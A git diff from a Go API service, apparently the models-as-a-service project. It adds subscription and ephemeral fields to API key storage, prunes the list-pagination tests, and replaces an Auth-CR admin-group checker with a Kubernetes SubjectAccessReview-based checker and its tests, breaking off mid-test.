 func (s *PostgresStore) Get(ctx context.Context, keyID string) (*ApiKey, error) {
 	query := `
-		SELECT id, name, description, username, created_at, expires_at, status, last_used_at
+		SELECT id, name, description, username, subscription, created_at, expires_at, status, last_used_at, ephemeral
 		FROM api_keys
 		WHERE id = $1
 	`
@@ -312,7 +337,7 @@ func (s *PostgresStore) Get(ctx context.Context, keyID string) (*ApiKey, error)
 	var expiresAt, lastUsedAt sql.NullTime
 	var description sql.NullString
 
-	if err := row.Scan(&k.ID, &k.Name, &description, &k.Username, &createdAt, &expiresAt, &k.Status, &lastUsedAt); err != nil {
+	if err := row.Scan(&k.ID, &k.Name, &description, &k.Username, &k.Subscription, &createdAt, &expiresAt, &k.Status, &lastUsedAt, &k.Ephemeral); err != nil {
 		if err == sql.ErrNoRows {
 			return nil, ErrKeyNotFound
 		}
@@ -336,7 +361,7 @@ func (s *PostgresStore) Get(ctx context.Context, keyID string) (*ApiKey, error)
 // GetByHash looks up an API key by its SHA-256 hash (critical path for validation).
 func (s *PostgresStore) GetByHash(ctx context.Context, keyHash string) (*ApiKey, error) {
 	query := `
-		SELECT id, username, name, description, user_groups, status, expires_at, last_used_at
+		SELECT id, username, name, description, user_groups, subscription, status, expires_at, last_used_at, ephemeral
 		FROM api_keys
 		WHERE key_hash = $1
 	`
@@ -348,7 +373,7 @@ func (s *PostgresStore) GetByHash(ctx context.Context, keyHash string) (*ApiKey,
 	var userGroups []string
 
 	// Use pq.Array to scan PostgreSQL TEXT[] into []string
-	if err := row.Scan(&k.ID, &k.Username, &k.Name, &description, pq.Array(&userGroups), &k.Status, &expiresAt, &lastUsedAt); err != nil {
+	if err := row.Scan(&k.ID, &k.Username, &k.Name, &description, pq.Array(&userGroups), &k.Subscription, &k.Status, &expiresAt, &lastUsedAt, &k.Ephemeral); err != nil {
 		if err == sql.ErrNoRows {
 			return nil, ErrKeyNotFound
 		}
diff --git a/maas-api/internal/api_keys/store_test.go b/maas-api/internal/api_keys/store_test.go
index b2f1dc677..23270a255 100644
--- a/maas-api/internal/api_keys/store_test.go
+++ b/maas-api/internal/api_keys/store_test.go
@@ -2,7 +2,6 @@ package api_keys_test
 
 import (
 	"context"
-	"fmt"
 	"testing"
 
 	"github.com/stretchr/testify/assert"
@@ -65,16 +64,13 @@ func TestAPIKeyOperations(t *testing.T) {
 	defer store.Close()
 
 	t.Run("AddKey", func(t *testing.T) {
-		err := store.AddKey(ctx, "user1", "key-id-1", "hash123", "my-key", "test key", []string{"system:authenticated", "premium-user"}, nil)
+		err := store.AddKey(ctx, "user1", "key-id-1", "hash123", "my-key", "test key", []string{"system:authenticated", "premium-user"}, "sub-1", nil, false)
 		require.NoError(t, err)
 
-		params := api_keys.PaginationParams{Limit: 10, Offset: 0}
-		result, err := store.List(ctx, "user1", params, nil)
+		// Verify key was added by fetching it
+		key, err := store.Get(ctx, "key-id-1")
 		require.NoError(t, err)
-		assert.Len(t, result.Keys, 1)
-		assert.Equal(t, "my-key", result.Keys[0].Name)
-		// KeyPrefix is NOT stored (security - reduces brute-force attack surface)
-		assert.False(t, result.HasMore)
+		assert.Equal(t, "my-key", key.Name)
 	})
 
 	t.Run("GetByHash", func(t *testing.T) {
@@ -101,7 +97,7 @@ func TestAPIKeyOperations(t *testing.T) {
 
 	t.Run("UpdateLastUsed", func(t *testing.T) {
 		// Add another key for this test
-		err := store.AddKey(ctx, "user2", "key-id-2", "hash456", "key2", "", []string{"system:authenticated", "free-user"}, nil)
+		err := store.AddKey(ctx, "user2", "key-id-2", "hash456", "key2", "", []string{"system:authenticated", "free-user"}, "sub-2", nil, false)
 		require.NoError(t, err)
 
 		err = store.UpdateLastUsed(ctx, "key-id-2")
@@ -113,246 +109,3 @@ func TestAPIKeyOperations(t *testing.T) {
 	})
 }
 
-func TestList(t *testing.T) {
-	ctx := t.Context()
-	store := createTestStore(t)
-	defer store.Close()
-
-	// Create 125 test keys to test pagination
-	const totalKeys = 125
-	username := "paginated-user"
-
-	for i := 1; i <= totalKeys; i++ {
-		keyID := fmt.Sprintf("key-%d", i)
-		keyHash := fmt.Sprintf("hash-%d", i)
-		name := fmt.Sprintf("Key %d", i)
-		err := store.AddKey(ctx, username, keyID, keyHash, name, "", []string{"system:authenticated"}, nil)
-		require.NoError(t, err)
-	}
-
-	t.Run("FirstPage", func(t *testing.T) {
-		params := api_keys.PaginationParams{Limit: 50, Offset: 0}
-		result, err := store.List(ctx, username, params, nil)
-		require.NoError(t, err)
-		assert.Len(t, result.Keys, 50, "should return exactly 50 keys")
-		assert.True(t, result.HasMore, "should indicate more pages exist")
-	})
-
-	t.Run("LastPage", func(t *testing.T) {
-		params := api_keys.PaginationParams{Limit: 50, Offset: 100}
-		result, err := store.List(ctx, username, params, nil)
-		require.NoError(t, err)
-		assert.Len(t, result.Keys, 25, "should return remaining 25 keys")
-		assert.False(t, result.HasMore, "should indicate no more pages")
-	})
-
-	t.Run("ValidationErrors", func(t *testing.T) {
-		t.Run("NegativeLimit", func(t *testing.T) {
-			params := api_keys.PaginationParams{Limit: 0, Offset: 0}
-			_, err := store.List(ctx, username, params, nil)
-			require.Error(t, err)
-			assert.Contains(t, err.Error(), "limit must be between 1 and 100")
-		})
-	})
-}
-
-func TestEmptyUsernameReturnsAllUsers(t *testing.T) {
-	ctx := t.Context()
-	store := createTestStore(t)
-	defer store.Close()
-
-	// Create 3 keys for alice
-	for i := 1; i <= 3; i++ {
-		keyID := fmt.Sprintf("alice-key-%d", i)
-		keyHash := fmt.Sprintf("alice-hash-%d", i)
-		name := fmt.Sprintf("Alice Key %d", i)
-		err := store.AddKey(ctx, "alice", keyID, keyHash, name, "", []string{"system:authenticated"}, nil)
-		require.NoError(t, err)
-	}
-
-	// Create 2 keys for bob
-	for i := 1; i <= 2; i++ {
-		keyID := fmt.Sprintf("bob-key-%d", i)
-		keyHash := fmt.Sprintf("bob-hash-%d", i)
-		name := fmt.Sprintf("Bob Key %d", i)
-		err := store.AddKey(ctx, "bob", keyID, keyHash, name, "", []string{"system:authenticated"}, nil)
-		require.NoError(t, err)
-	}
-
-	// List with empty username should return all keys
-	params := api_keys.PaginationParams{Limit: 100, Offset: 0}
-	result, err := store.List(ctx, "", params, nil)
-	require.NoError(t, err)
-	assert.Len(t, result.Keys, 5, "should return all 5 keys from both users")
-
-	// Verify we have keys from both users
-	usernames := make(map[string]int)
-	for _, key := range result.Keys {
-		usernames[key.Username]++
-	}
-	assert.Equal(t, 3, usernames["alice"], "should have 3 keys from alice")
-	assert.Equal(t, 2, usernames["bob"], "should have 2 keys from bob")
-}
-
-func TestFilterByStatus(t *testing.T) {
-	ctx := t.Context()
-	store := createTestStore(t)
-	defer store.Close()
-
-	// Create 3 active keys
-	for i := 1; i <= 3; i++ {
-		keyID := fmt.Sprintf("active-key-%d", i)
-		keyHash := fmt.Sprintf("active-hash-%d", i)
-		name := fmt.Sprintf("Active Key %d", i)
-		err := store.AddKey(ctx, "testuser", keyID, keyHash, name, "", []string{"system:authenticated"}, nil)
-		require.NoError(t, err)
-	}
-
-	// Create 2 revoked keys
-	for i := 1; i <= 2; i++ {
-		keyID := fmt.Sprintf("revoked-key-%d", i)
-		keyHash := fmt.Sprintf("revoked-hash-%d", i)
-		name := fmt.Sprintf("Revoked Key %d", i)
-		err := store.AddKey(ctx, "testuser", keyID, keyHash, name, "", []string{"system:authenticated"}, nil)
-		require.NoError(t, err)
-		err = store.Revoke(ctx, keyID)
-		require.NoError(t, err)
-	}
-
-	params := api_keys.PaginationParams{Limit: 100, Offset: 0}
-
-	t.Run("ActiveOnly", func(t *testing.T) {
-		result, err := store.List(ctx, "testuser", params, []string{"active"})
-		require.NoError(t, err)
-		assert.Len(t, result.Keys, 3, "should return 3 active keys")
-		for _, key := range result.Keys {
-			assert.Equal(t, api_keys.StatusActive, key.Status)
-		}
-	})
-
-	t.Run("RevokedOnly", func(t *testing.T) {
-		result, err := store.List(ctx, "testuser", params, []string{"revoked"})
-		require.NoError(t, err)
-		assert.Len(t, result.Keys, 2, "should return 2 revoked keys")
-		for _, key := range result.Keys {
-			assert.Equal(t, api_keys.StatusRevoked, key.Status)
-		}
-	})
-}
-
-func TestFilterByMultipleStatuses(t *testing.T) {
-	ctx := t.Context()
-	store := createTestStore(t)
-	defer store.Close()
-
-	// Create 2 active keys
-	for i := 1; i <= 2; i++ {
-		keyID := fmt.Sprintf("active-key-%d", i)
-		keyHash := fmt.Sprintf("active-hash-%d", i)
-		name := fmt.Sprintf("Active Key %d", i)
-		err := store.AddKey(ctx, "testuser", keyID, keyHash, name, "", []string{"system:authenticated"}, nil)
-		require.NoError(t, err)
-	}
-
-	// Create 1 revoked key
-	keyID := "revoked-key"
-	keyHash := "revoked-hash"
-	err := store.AddKey(ctx, "testuser", keyID, keyHash, "Revoked Key", "", []string{"system:authenticated"}, nil)
-	require.NoError(t, err)
-	err = store.Revoke(ctx, keyID)
-	require.NoError(t, err)
-
-	// Create 1 expired key (using past expiration)
-	// Note: MockStore might not support expiration - this is a conceptual test
-	// If expiration is not supported, this test will verify the filter logic works
-
-	params := api_keys.PaginationParams{Limit: 100, Offset: 0}
-	result, err := store.List(ctx, "testuser", params, []string{"active", "revoked"})
-	require.NoError(t, err)
-
-	// Should return active + revoked keys (3 total)
-	assert.Len(t, result.Keys, 3, "should return 2 active + 1 revoked = 3 keys")
-
-	// Verify we have both statuses
-	statuses := make(map[string]int)
-	for _, key := range result.Keys {
-		statuses[string(key.Status)]++
-	}
-	assert.Equal(t, 2, statuses["active"], "should have 2 active keys")
-	assert.Equal(t, 1, statuses["revoked"], "should have 1 revoked key")
-}
-
-func TestFilterByUsernameAndStatus(t *testing.T) {
-	ctx := t.Context()
-	store := createTestStore(t)
-	defer store.Close()
-
-	// alice: 2 active, 1 revoked
-	for i := 1; i <= 2; i++ {
-		keyID := fmt.Sprintf("alice-active-%d", i)
-		keyHash := fmt.Sprintf("alice-hash-active-%d", i)
-		name := fmt.Sprintf("Alice Active Key %d", i)
-		err := store.AddKey(ctx, "alice", keyID, keyHash, name, "", []string{"system:authenticated"}, nil)
-		require.NoError(t, err)
-	}
-	keyID := "alice-revoked"
-	keyHash := "alice-hash-revoked"
-	err := store.AddKey(ctx, "alice", keyID, keyHash, "Alice Revoked Key", "", []string{"system:authenticated"}, nil)
-	require.NoError(t, err)
-	err = store.Revoke(ctx, keyID)
-	require.NoError(t, err)
-
-	// bob: 1 active, 2 revoked
-	keyID = "bob-active"
-	keyHash = "bob-hash-active"
-	err = store.AddKey(ctx, "bob", keyID, keyHash, "Bob Active Key", "", []string{"system:authenticated"}, nil)
-	require.NoError(t, err)
-
-	for i := 1; i <= 2; i++ {
-		keyID = fmt.Sprintf("bob-revoked-%d", i)
-		keyHash = fmt.Sprintf("bob-hash-revoked-%d", i)
-		name := fmt.Sprintf("Bob Revoked Key %d", i)
-		err = store.AddKey(ctx, "bob", keyID, keyHash, name, "", []string{"system:authenticated"}, nil)
-		require.NoError(t, err)
-		err = store.Revoke(ctx, keyID)
-		require.NoError(t, err)
-	}
-
-	params := api_keys.PaginationParams{Limit: 100, Offset: 0}
-
-	t.Run("AliceActive", func(t *testing.T) {
-		result, err := store.List(ctx, "alice", params, []string{"active"})
-		require.NoError(t, err)
-		assert.Len(t, result.Keys, 2, "alice should have 2 active keys")
-		for _, key := range result.Keys {
-			assert.Equal(t, "alice", key.Username)
-			assert.Equal(t, api_keys.StatusActive, key.Status)
-		}
-	})
-
-	t.Run("AliceRevoked", func(t *testing.T) {
-		result, err := store.List(ctx, "alice", params, []string{"revoked"})
-		require.NoError(t, err)
-		assert.Len(t, result.Keys, 1, "alice should have 1 revoked key")
-		assert.Equal(t, "alice", result.Keys[0].Username)
-		assert.Equal(t, api_keys.StatusRevoked, result.Keys[0].Status)
-	})
-
-	t.Run("BobActive", func(t *testing.T) {
-		result, err := store.List(ctx, "bob", params, []string{"active"})
-		require.NoError(t, err)
-		assert.Len(t, result.Keys, 1, "bob should have 1 active key")
-		assert.Equal(t, "bob", result.Keys[0].Username)
-		assert.Equal(t, api_keys.StatusActive, result.Keys[0].Status)
-	})
-
-	t.Run("BobRevoked", func(t *testing.T) {
-		result, err := store.List(ctx, "bob", params, []string{"revoked"})
-		require.NoError(t, err)
-		assert.Len(t, result.Keys, 2, "bob should have 2 revoked keys")
-		for _, key := range result.Keys {
-			assert.Equal(t, "bob", key.Username)
-			assert.Equal(t, api_keys.StatusRevoked, key.Status)
-		}
-	})
-}
diff --git a/maas-api/internal/api_keys/types.go b/maas-api/internal/api_keys/types.go
index 163d0fe36..3a9fb0987 100644
--- a/maas-api/internal/api_keys/types.go
+++ b/maas-api/internal/api_keys/types.go
@@ -24,21 +24,24 @@ type ApiKey struct {
 	Name           string   `json:"name"`
 	Description    string   `json:"description,omitempty"`
 	Username       string   `json:"username,omitempty"`
+	Subscription   string   `json:"subscription,omitempty"`   // MaaSSubscription name bound at mint time
 	Groups         []string `json:"groups,omitempty"`         // User's groups at creation (immutable snapshot for authorization)
 	CreationDate   string   `json:"creationDate"`
 	ExpirationDate string   `json:"expirationDate,omitempty"` // Empty for permanent keys
 	Status         Status   `json:"status"`                   // "active", "expired", "revoked"
 	LastUsedAt     string   `json:"lastUsedAt,omitempty"`     // Tracks when key was last used for validation
+	Ephemeral      bool     `json:"ephemeral"`                // Short-lived programmatic key
 }
 
 // ValidationResult holds the result of API key validation (for Authorino HTTP callback).
 type ValidationResult struct {
-	Valid    bool     `json:"valid"`
-	UserID   string   `json:"userId,omitempty"`
-	Username string   `json:"username,omitempty"`
-	KeyID    string   `json:"keyId,omitempty"`
-	Groups   []string `json:"groups,omitempty"` // User groups for subscription-based authorization
-	Reason   string   `json:"reason,omitempty"` // If invalid: "key not found", "revoked", etc.
+	Valid        bool     `json:"valid"`
+	UserID       string   `json:"userId,omitempty"`
+	Username     string   `json:"username,omitempty"`
+	KeyID        string   `json:"keyId,omitempty"`
+	Groups       []string `json:"groups,omitempty"`       // User groups for subscription-based authorization
+	Subscription string   `json:"subscription,omitempty"` // MaaSSubscription name from DB (Authorino → subscription-info)
+	Reason       string   `json:"reason,omitempty"`       // If invalid: "key not found", "revoked", etc.
 }
 
 // PaginationParams holds pagination parameters.
@@ -53,13 +56,6 @@ type PaginatedResult struct {
 	HasMore bool
 }
 
-// ListAPIKeysResponse is the HTTP response for GET /v1/api-keys.
-type ListAPIKeysResponse struct {
-	Object  string   `json:"object"` // Always "list"
-	Data    []ApiKey `json:"data"`
-	HasMore bool     `json:"has_more"`
-}
-
 // ============================================================
 // SEARCH REQUEST/RESPONSE TYPES
 // ============================================================
@@ -91,6 +87,9 @@ type SearchFilters struct {
 	// Phase 4: Boolean filters (future)
 	HasExpiration *bool `json:"hasExpiration,omitempty"` // true = expiring, false = permanent
 	HasBeenUsed   *bool `json:"hasBeenUsed,omitempty"`   // true = used, false = never used
+
+	// Ephemeral key filter
+	IncludeEphemeral *bool `json:"includeEphemeral,omitempty"` // Include ephemeral keys in results (default: false)
 }
 
 // SortParams specifies sorting criteria.
diff --git a/maas-api/internal/auth/admin_checker.go b/maas-api/internal/auth/admin_checker.go
deleted file mode 100644
index d9f67f1e1..000000000
--- a/maas-api/internal/auth/admin_checker.go
+++ /dev/null
@@ -1,71 +0,0 @@
-package auth
-
-import (
-	"errors"
-	"fmt"
-	"slices"
-
-	"k8s.io/apimachinery/pkg/apis/meta/v1/unstructured"
-	"k8s.io/client-go/tools/cache"
-)
-
-// AdminChecker checks if a user is an admin based on Auth CR from OpenDataHub operator.
-// The Auth CR is a cluster-scoped singleton named "auth" from services.opendatahub.io/v1alpha1.
-type AdminChecker struct {
-	authLister cache.GenericLister
-}
-
-// NewAdminChecker creates a new AdminChecker that queries the Auth CR.
-func NewAdminChecker(authLister cache.GenericLister) *AdminChecker {
-	return &AdminChecker{
-		authLister: authLister,
-	}
-}
-
-// IsAdmin checks if any of the user's groups match the admin groups defined in the Auth CR.
-// Returns true if the user belongs to at least one admin group, false otherwise.
-// If the Auth CR doesn't exist or can't be read, returns false (fail-closed).
-func (a *AdminChecker) IsAdmin(userGroups []string) bool {
-	adminGroups, err := a.GetAdminGroups()
-	if err != nil {
-		// Fail-closed: if we can't determine admin groups, deny admin access
-		return false
-	}
-
-	// Check if any user group matches admin groups
-	for _, userGroup := range userGroups {
-		if slices.Contains(adminGroups, userGroup) {
-			return true
-		}
-	}
-
-	return false
-}
-
-// GetAdminGroups fetches the admin groups from the Auth CR.
-// The Auth CR is cluster-scoped and must be named "auth".
-// Returns empty slice and error if Auth CR doesn't exist or has invalid format.
-func (a *AdminChecker) GetAdminGroups() ([]string, error) {
-	// Auth CR is cluster-scoped, so we get it directly by name
-	obj, err := a.authLister.Get("auth")
-	if err != nil {
-		return nil, fmt.Errorf("failed to get Auth CR: %w", err)
-	}
-
-	// Convert to unstructured to access fields
-	u, ok := obj.(*unstructured.Unstructured)
-	if !ok {
-		return nil, fmt.Errorf("unexpected type for Auth CR: %T", obj)
-	}
-
-	// Extract spec.adminGroups field
-	adminGroups, found, err := unstructured.NestedStringSlice(u.Object, "spec", "adminGroups")
-	if err != nil {
-		return nil, fmt.Errorf("failed to parse adminGroups from Auth CR: %w", err)
-	}
-	if !found {
-		return nil, errors.New("adminGroups field not found in Auth CR spec")
-	}
-
-	return adminGroups, nil
-}
diff --git a/maas-api/internal/auth/admin_checker_test.go b/maas-api/internal/auth/admin_checker_test.go
deleted file mode 100644
index 295ea5e1b..000000000
--- a/maas-api/internal/auth/admin_checker_test.go
+++ /dev/null
@@ -1,164 +0,0 @@
-package auth_test
-
-import (
-	"errors"
-	"testing"
-
-	"github.com/stretchr/testify/assert"
-	"github.com/stretchr/testify/require"
-	"k8s.io/apimachinery/pkg/apis/meta/v1/unstructured"
-	"k8s.io/apimachinery/pkg/labels"
-	"k8s.io/apimachinery/pkg/runtime"
-	"k8s.io/client-go/tools/cache"
-
-	"github.com/opendatahub-io/models-as-a-service/maas-api/internal/auth"
-)
-
-var errAuthCRNotFound = errors.New("auth CR not found")
-
-// mockAuthLister implements cache.GenericLister for testing.
-type mockAuthLister struct {
-	authCR *unstructured.Unstructured
-	err    error
-}
-
-func (m *mockAuthLister) List(selector labels.Selector) ([]runtime.Object, error) {
-	return nil, nil
-}
-
-func (m *mockAuthLister) Get(name string) (runtime.Object, error) {
-	if m.err != nil {
-		return nil, m.err
-	}
-	return m.authCR, nil
-}
-
-func (m *mockAuthLister) ByNamespace(namespace string) cache.GenericNamespaceLister {
-	return nil
-}
-
-// createAuthCR creates a mock Auth CR with the given admin groups.
-func createAuthCR(adminGroups []string) *unstructured.Unstructured {
-	// Convert []string to []interface{} for unstructured.NestedStringSlice() to work correctly
-	adminGroupsInterface := make([]any, len(adminGroups))
-	for i, g := range adminGroups {
-		adminGroupsInterface[i] = g
-	}
-
-	return &unstructured.Unstructured{
-		Object: map[string]any{
-			"apiVersion": "services.opendatahub.io/v1alpha1",
-			"kind":       "Auth",
-			"metadata": map[string]any{
-				"name": "auth",
-			},
-			"spec": map[string]any{
-				"adminGroups": adminGroupsInterface,
-			},
-		},
-	}
-}
-
-func TestIsAdmin(t *testing.T) {
-	t.Run("UserInAdminGroup", func(t *testing.T) {
-		authCR := createAuthCR([]string{"admin-group", "super-admins"})
-		lister := &mockAuthLister{authCR: authCR}
-		checker := auth.NewAdminChecker(lister)
-
-		userGroups := []string{"users", "admin-group"}
-		assert.True(t, checker.IsAdmin(userGroups), "user with admin-group should be admin")
-	})
-
-	t.Run("UserNotInAdminGroup", func(t *testing.T) {
-		authCR := createAuthCR([]string{"admin-group", "super-admins"})
-		lister := &mockAuthLister{authCR: authCR}
-		checker := auth.NewAdminChecker(lister)
-
-		userGroups := []string{"users", "developers"}
-		assert.False(t, checker.IsAdmin(userGroups), "user without admin groups should not be admin")
-	})
-
-	t.Run("AuthCRNotFound", func(t *testing.T) {
-		lister := &mockAuthLister{err: errAuthCRNotFound}
-		checker := auth.NewAdminChecker(lister)
-
-		userGroups := []string{"users", "admin-group"}
-		assert.False(t, checker.IsAdmin(userGroups), "should fail-closed when Auth CR not found")
-	})
-
-	t.Run("MultipleAdminGroups", func(t *testing.T) {
-		authCR := createAuthCR([]string{"admin-group-1", "admin-group-2", "admin-group-3"})
-		lister := &mockAuthLister{authCR: authCR}
-		checker := auth.NewAdminChecker(lister)
-
-		t.Run("MatchesFirst", func(t *testing.T) {
-			userGroups := []string{"admin-group-1", "users"}
-			assert.True(t, checker.IsAdmin(userGroups))
-		})
-
-		t.Run("MatchesMiddle", func(t *testing.T) {
-			userGroups := []string{"users", "admin-group-2"}
-			assert.True(t, checker.IsAdmin(userGroups))
-		})
-
-		t.Run("MatchesLast", func(t *testing.T) {
-			userGroups := []string{"users", "admin-group-3"}
-			assert.True(t, checker.IsAdmin(userGroups))
-		})
-	})
-}
-
-func TestGetAdminGroups(t *testing.T) {
-	t.Run("Success", func(t *testing.T) {
-		expectedGroups := []string{"admin-group", "super-admins"}
-		authCR := createAuthCR(expectedGroups)
-		lister := &mockAuthLister{authCR: authCR}
-		checker := auth.NewAdminChecker(lister)
-
-		groups, err := checker.GetAdminGroups()
-		require.NoError(t, err)
-		assert.Equal(t, expectedGroups, groups)
-	})
-
-	t.Run("AuthCRNotFound", func(t *testing.T) {
-		lister := &mockAuthLister{err: errAuthCRNotFound}
-		checker := auth.NewAdminChecker(lister)
-
-		groups, err := checker.GetAdminGroups()
-		require.Error(t, err)
-		assert.Nil(t, groups)
-		assert.Contains(t, err.Error(), "failed to get Auth CR")
-	})
-
-	t.Run("MissingAdminGroupsField", func(t *testing.T) {
-		authCR := &unstructured.Unstructured{
-			Object: map[string]any{
-				"apiVersion": "services.opendatahub.io/v1alpha1",
-				"kind":       "Auth",
-				"metadata": map[string]any{
-					"name": "auth",
-				},
-				"spec": map[string]any{
-					// No adminGroups field
-				},
-			},
-		}
-		lister := &mockAuthLister{authCR: authCR}
-		checker := auth.NewAdminChecker(lister)
-
-		groups, err := checker.GetAdminGroups()
-		require.Error(t, err)
-		assert.Nil(t, groups)
-		assert.Contains(t, err.Error(), "adminGroups field not found")
-	})
-
-	t.Run("EmptyAdminGroups", func(t *testing.T) {
-		authCR := createAuthCR([]string{})
-		lister := &mockAuthLister{authCR: authCR}
-		checker := auth.NewAdminChecker(lister)
-
-		groups, err := checker.GetAdminGroups()
-		require.NoError(t, err)
-		assert.Empty(t, groups, "empty admin groups should be allowed (Auth CR validation handles minimum)")
-	})
-}
diff --git a/maas-api/internal/auth/sar_admin_checker.go b/maas-api/internal/auth/sar_admin_checker.go
new file mode 100644
index 000000000..b5544fc6c
--- /dev/null
+++ b/maas-api/internal/auth/sar_admin_checker.go
@@ -0,0 +1,66 @@
+package auth
+
+import (
+	"context"
+	"log/slog"
+
+	authv1 "k8s.io/api/authorization/v1"
+	metav1 "k8s.io/apimachinery/pkg/apis/meta/v1"
+	"k8s.io/client-go/kubernetes"
+
+	"github.com/opendatahub-io/models-as-a-service/maas-api/internal/token"
+)
+
+// SARAdminChecker checks admin status via Kubernetes SubjectAccessReview.
+// Admin is defined as: can create maasauthpolicies in the MaaS namespace.
+// This aligns with RBAC from opendatahub-operator#3301 which grants admin groups
+// CRUD access to MaaSAuthPolicy and MaaSSubscription resources.
+type SARAdminChecker struct {
+	client    kubernetes.Interface
+	namespace string
+}
+
+// NewSARAdminChecker creates a SAR-based admin checker.
+// The namespace parameter specifies where maasauthpolicies are checked.
+func NewSARAdminChecker(client kubernetes.Interface, namespace string) *SARAdminChecker {
+	if client == nil {
+		panic("client cannot be nil for SARAdminChecker")
+	}
+	if namespace == "" {
+		panic("namespace cannot be empty for SARAdminChecker")
+	}
+	return &SARAdminChecker{
+		client:    client,
+		namespace: namespace,
+	}
+}
+
+// IsAdmin checks if the user can create maasauthpolicies in the configured namespace.
+// This is a proxy for "is this user an admin" based on RBAC permissions.
+// Returns false (fail-closed) if the check cannot be performed.
+func (s *SARAdminChecker) IsAdmin(ctx context.Context, user *token.UserContext) bool {
+	if s == nil || s.client == nil || user == nil || user.Username == "" {
+		return false
+	}
+
+	sar := &authv1.SubjectAccessReview{
+		Spec: authv1.SubjectAccessReviewSpec{
+			User:   user.Username,
+			Groups: user.Groups,
+			ResourceAttributes: &authv1.ResourceAttributes{
+				Namespace: s.namespace,
+				Verb:      "create",
+				Group:     "maas.opendatahub.io",
+				Resource:  "maasauthpolicies",
+			},
+		},
+	}
+
+	result, err := s.client.AuthorizationV1().SubjectAccessReviews().Create(ctx, sar, metav1.CreateOptions{})
+	if err != nil {
+		slog.Warn("SAR admin check failed", "error", err.Error())
+		return false
+	}
+
+	return result.Status.Allowed
+}
diff --git a/maas-api/internal/auth/sar_admin_checker_test.go b/maas-api/internal/auth/sar_admin_checker_test.go
new file mode 100644
index 000000000..a0b2a345e
--- /dev/null
+++ b/maas-api/internal/auth/sar_admin_checker_test.go
@@ -0,0 +1,145 @@
+package auth_test
+
+import (
+	"context"
+	"testing"
+
+	"github.com/stretchr/testify/assert"
+	"github.com/stretchr/testify/require"
+	authv1 "k8s.io/api/authorization/v1"
+	"k8s.io/apimachinery/pkg/runtime"
+	"k8s.io/client-go/kubernetes/fake"
+	k8stesting "k8s.io/client-go/testing"
+
+	"github.com/opendatahub-io/models-as-a-service/maas-api/internal/auth"
+	"github.com/opendatahub-io/models-as-a-service/maas-api/internal/token"
+)
+
+func TestSARAdminChecker_IsAdmin(t *testing.T) {
+	const testNamespace = "models-as-a-service"
+
+	t.Run("AdminUserAllowed", func(t *testing.T) {
+		client := fake.NewSimpleClientset()
+		client.PrependReactor("create", "subjectaccessreviews", func(action k8stesting.Action) (bool, runtime.Object, error) {
+			sar, ok := action.(k8stesting.CreateAction).GetObject().(*authv1.SubjectAccessReview)
+			require.True(t, ok)
+			sar.Status.Allowed = true
+			return true, sar, nil
+		})
+
+		checker := auth.NewSARAdminChecker(client, testNamespace)
+		user := &token.UserContext{Username: "admin-user", Groups: []string{"admin-group"}}
+
+		assert.True(t, checker.IsAdmin(context.Background(), user))
+	})
+
+	t.Run("RegularUserDenied", func(t *testing.T) {
+		client := fake.NewSimpleClientset()
+		client.PrependReactor("create", "subjectaccessreviews", func(action k8stesting.Action) (bool, runtime.Object, error) {
+			sar, ok := action.(k8stesting.CreateAction).GetObject().(*authv1.SubjectAccessReview)
+			require.True(t, ok)
+			sar.Status.Allowed = false
+			return true, sar, nil
+		})
+
+		checker := auth.NewSARAdminChecker(client, testNamespace)
+		user := &token.UserContext{Username: "regular-user", Groups: []string{"users"}}
+
+		assert.False(t, checker.IsAdmin(context.Background(), user))
+	})
+
+	t.Run("NilUserReturnsFalse", func(t *testing.T) {
+		client := fake.NewSimpleClientset()
+		checker := auth.NewSARAdminChecker(client, testNamespace)
+
+		assert.False(t, checker.IsAdmin(context.Background(), nil))
+	})
+
+	t.Run("EmptyUsernameReturnsFalse", func(t *testing.T) {
+		client := fake.NewSimpleClientset()
+		checker := auth.NewSARAdminChecker(client, testNamespace)
+		user := &token.UserContext{Username: "", Groups: []string{"admin-group"}}
+
+		assert.False(t, checker.IsAdmin(context.Background(), user))
+	})
+
+	t.Run("NilCheckerReturnsFalse", func(t *testing.T) {
+		var checker *auth.SARAdminChecker
+		user := &token.UserContext{Username: "admin-user", Groups: []string{"admin-group"}}
+
+		assert.False(t, checker.IsAdmin(context.Background(), user))
+	})
+
+	t.Run("NilClientPanics", func(t *testing.T) {
+		assert.Panics(t, func() {
+			auth.NewSARAdminChecker(nil, testNamespace)
+		})
+	})
+
+	t.Run("EmptyNamespacePanics", func(t *testing.T) {
+		client := fake.NewSimpleClientset()
+		assert.Panics(t, func() {
+			auth.NewSARAdminChecker(client, "")
+		})
+	})
+
+	t.Run("APIErrorReturnsFalse_FailClosed", func(t *testing.T) {
+		client := fake.NewSimpleClientset()
+		client.PrependReactor("create", "subjectaccessreviews", func(action k8stesting.Action) (bool, runtime.Object, error) {
+			return true, nil, assert.AnError
+		})
+
+		checker := auth.NewSARAdminChecker(client, testNamespace)
+		user := &token.UserContext{Username: "admin-user", Groups: []string{"admin-group"}}
+
+		assert.False(t, checker.IsAdmin(context.Background(), user), "should fail-closed on API error")
+	})
+
+	t.Run("VerifiesSARParameters", func(t *testing.T) {
+		client := fake.NewSimpleClientset()
+		var capturedSAR *authv1.SubjectAccessReview
+		client.PrependReactor("create", "subjectaccessreviews", func(action k8stesting.Action) (bool, runtime.Object, error) {
+			var ok bool
+			capturedSAR, ok = action.(k8stesting.CreateAction).GetObject().(*authv1.SubjectAccessReview)
+			require.True(t, ok)
+			capturedSAR.Status.Allowed = true
+			return true, capturedSAR, nil
+		})
+
+		checker := auth.NewSARAdminChecker(client, testNamespace)
+		user := &token.UserContext{Username: "alice", Groups: []string{"group1", "group2"}}
+
+		checker.IsAdmin(context.Background(), user)
+
+		require.NotNil(t, capturedSAR)
+		assert.Equal(t, "alice", capturedSAR.Spec.User)
+		assert.Equal(t, []string{"group1", "group2"}, capturedSAR.Spec.Groups)
+		assert.Equal(t, testNamespace, capturedSAR.Spec.ResourceAttributes.Namespace)
+		assert.Equal(t, "create", capturedSAR.Spec.ResourceAttributes.Verb)
+		assert.Equal(t, "maas.opendatahub.io", capturedSAR.Spec.ResourceAttributes.Group)
+		assert.Equal(t, "maasauthpolicies", capturedSAR.Spec.ResourceAttributes.Resource)
+	})
+
+	t.Run("CustomNamespace", func(t *testing.T) {
+		client := fake.NewSimpleClientset()
+		var capturedSAR *authv1.SubjectAccessReview
+		client.PrependReactor("create", "subjectaccessreviews", func(action k8stesting.Action) (bool, runtime.Object, error) {
+			var ok bool
+			capturedSAR, ok = action.(k8stesting.CreateAction).GetObject().(*authv1.SubjectAccessReview)
+			require.True(t, ok)
